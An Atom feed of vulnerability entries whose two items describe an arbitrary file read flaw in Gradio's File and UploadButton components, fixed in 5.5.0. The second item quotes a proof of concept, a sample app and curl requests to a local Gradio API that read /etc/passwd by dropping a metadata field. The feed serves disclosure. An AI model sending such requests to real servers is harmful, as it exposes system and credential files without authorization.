<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-07T15:24:54.888646+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2024-51751</id>
    <title>CVE-2024-51751 — Arbitrary file read with File and UploadButton components in Gradio</title>
    <updated>2026-10-07T15:24:54.890468+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> gradio-app gradio, gradio_project gradio</p>
<p>Gradio is an open-source Python package designed to enable quick builds of a demo or web application. If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. This issue has been addressed in release version 5.5.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2024-51751"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-rhm9-gp5p-5248</id>
    <title>GHSA-rhm9-gp5p-5248 — Gradio vulnerable to arbitrary file read with File and UploadButton components</title>
    <updated>2026-10-07T15:24:54.890530+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: gradio</p>
<p>### Summary
If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.</p>
<p>### Details
Consider the following application where a user can upload a file and preview its content:
```
import gradio as gr</p>
<p>def greet(value: bytes):
    return str(value)</p>
<p>demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox")</p>
<p>if __name__ == "__main__":
    demo.launch()
```</p>
<p>If we run this application and make the following request (which attempts to read the `/etc/passwd` file)
```
curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain","meta":{"_type":"gradio.FileData"}}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'
```</p>
<p>Then this results in the following error on the server</p>
<p>```
gradio.exceptions.InvalidPathError: Cannot move /etc/passwd to the gradio cache dir because it was not uploaded by a user.
```</p>
<p>This is expected. However, if we now remove the `"meta":{"_type":"gradio.FileData"}` from the request:
```
curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"sess…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-rhm9-gp5p-5248"/>
  </entry>
</feed>
